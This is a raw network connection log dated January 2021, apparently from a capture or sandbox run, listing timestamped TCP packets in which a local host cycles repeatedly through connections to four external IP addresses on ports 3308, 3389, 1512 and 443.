Jan 12, 2021 07:45:30.799225092 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.814162970 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.859802008 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.860009909 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.864896059 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.865067005 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.908713102 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.908988953 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:30.948390007 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.952254057 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:30.952306032 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:31.065597057 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:31.065654039 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:31.065886021 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:31.071727991 CET	49385	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:31.115106106 CET	3308	49385	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:31.185094118 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.239132881 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.239321947 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.240483046 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.294739962 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.325608969 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.325651884 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.325741053 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.337068081 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.409327030 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.409694910 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.417439938 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.417468071 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.471849918 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.472196102 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.513499975 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.529439926 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.529462099 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.621273994 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.621339083 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.621594906 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.621643066 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.623776913 CET	49386	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:31.681289911 CET	3389	49386	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:31.728019953 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.781059980 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.781182051 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.782727957 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.835683107 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.842612982 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.842648983 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.842746019 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.858618975 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.912772894 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.913039923 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.922360897 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.922671080 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:31.975557089 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:31.975821972 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:32.014002085 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:32.028856039 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:32.130158901 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:32.130209923 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:32.130327940 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:32.135931015 CET	49387	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:32.189126968 CET	1512	49387	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:32.246141911 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.298682928 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.298799992 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.300082922 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.352437019 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.367144108 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.367283106 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.383622885 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.439440966 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.439635992 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.450175047 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.450566053 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.503030062 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.503554106 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.555938005 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.673954010 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.674026012 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.674134970 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.679909945 CET	49388	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:32.732398987 CET	443	49388	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:32.797636032 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.841089010 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:32.841286898 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.842813969 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.886142969 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:32.896745920 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:32.896817923 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:32.896883965 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.896929979 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.911484003 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.956490040 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:32.956671000 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.966227055 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:32.966422081 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:33.009630919 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:33.009866953 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:33.053282022 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:33.166352034 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:33.166413069 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:33.166632891 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:33.172286987 CET	49389	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:33.215616941 CET	3308	49389	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:33.291528940 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.347127914 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.347341061 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.348546982 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.403430939 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.437031031 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.437100887 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.437201977 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.437253952 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.449814081 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.511445045 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.511748075 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.521163940 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.521231890 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.576354980 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.576685905 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.616553068 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.638046980 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.638083935 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.729466915 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.729489088 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.729717016 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.729780912 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.735449076 CET	49390	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:33.790682077 CET	3389	49390	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:33.851356030 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:33.904479980 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:33.904588938 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:33.905728102 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:33.958865881 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:33.965955973 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:33.966027021 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:33.966051102 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:33.966068983 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:33.972934008 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.027163029 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.027266026 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.031086922 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.031157970 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.084361076 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.084603071 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.122067928 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.137789011 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.239573956 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.239599943 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.239837885 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.245575905 CET	49391	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:34.298562050 CET	1512	49391	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:34.367641926 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.420268059 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.420372963 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.421899080 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.474248886 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.489134073 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.489245892 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.500145912 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.555149078 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.555387020 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.565460920 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.565783024 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.618191957 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.618509054 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.671129942 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.790251970 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.790323019 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.790457010 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.796109915 CET	49392	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:34.848575115 CET	443	49392	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:34.919296980 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:34.962690115 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:34.962867975 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:34.964201927 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.007536888 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.019821882 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.019896030 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.019984007 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.021574020 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.038165092 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.083338976 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.083599091 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.092873096 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.093095064 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.136295080 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.136564016 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.176300049 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.179985046 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.180058956 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.292968988 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.293047905 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.293171883 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.293219090 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.298865080 CET	49393	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:35.342078924 CET	3308	49393	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:35.413021088 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.472349882 CET	3389	49394	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:35.472523928 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.473848104 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.532016039 CET	3389	49394	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:35.553463936 CET	3389	49394	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:35.553554058 CET	3389	49394	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:35.553625107 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.553972006 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.564199924 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.620906115 CET	3389	49394	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:35.621185064 CET	49394	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:35.675251007 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.728199005 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.728316069 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.729460955 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.782372952 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.789576054 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.789650917 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.789679050 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.789705038 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.805850029 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.859972000 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.860274076 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.870296001 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.870628119 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.923620939 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.923949003 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:35.961922884 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.976958990 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:35.977031946 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:36.078028917 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:36.078074932 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:36.078396082 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:36.084299088 CET	49395	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:36.137243986 CET	1512	49395	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:36.189377069 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.241486073 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.241576910 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.242526054 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.294059038 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.308809996 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.308976889 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.319892883 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.374016047 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.374248981 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.394149065 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.394383907 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.446252108 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.446472883 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.498601913 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.617335081 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.617403984 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.617693901 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.623409986 CET	49396	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:36.675220966 CET	443	49396	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:36.739620924 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.782970905 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.783168077 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.784472942 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.827553988 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.842304945 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.842367887 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.842456102 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.842502117 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.856316090 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.901499033 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.901752949 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.911986113 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.912267923 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.955526114 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.955905914 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:36.995995998 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.999102116 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:36.999157906 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:37.112826109 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:37.112868071 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:37.113176107 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:37.118916035 CET	49397	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:37.162296057 CET	3308	49397	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:37.238879919 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.294028997 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.294156075 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.295747995 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.349805117 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.392102003 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.392174006 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.392218113 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.392260075 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.405848980 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.460249901 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.469257116 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.469495058 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.478657007 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.478812933 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.532803059 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.533109903 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.573613882 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.587958097 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.587996006 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.680474043 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.680538893 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.680768967 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.687179089 CET	49398	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:37.742264032 CET	3389	49398	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:37.800290108 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.853280067 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:37.853378057 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.854784012 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.907480955 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:37.914273977 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:37.914344072 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:37.914380074 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.914410114 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.930865049 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.984793901 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:37.984999895 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.995081902 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:37.995409966 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:38.048162937 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.048419952 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:38.085860014 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.101193905 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.101248980 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.202493906 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.202544928 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.202733040 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:38.208399057 CET	49399	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:38.261409044 CET	1512	49399	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:38.330666065 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.382993937 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.383137941 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.384691954 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.436819077 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.451756001 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.451864004 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.469265938 CET	49400	443	192.168.2.22	77.220.64.37
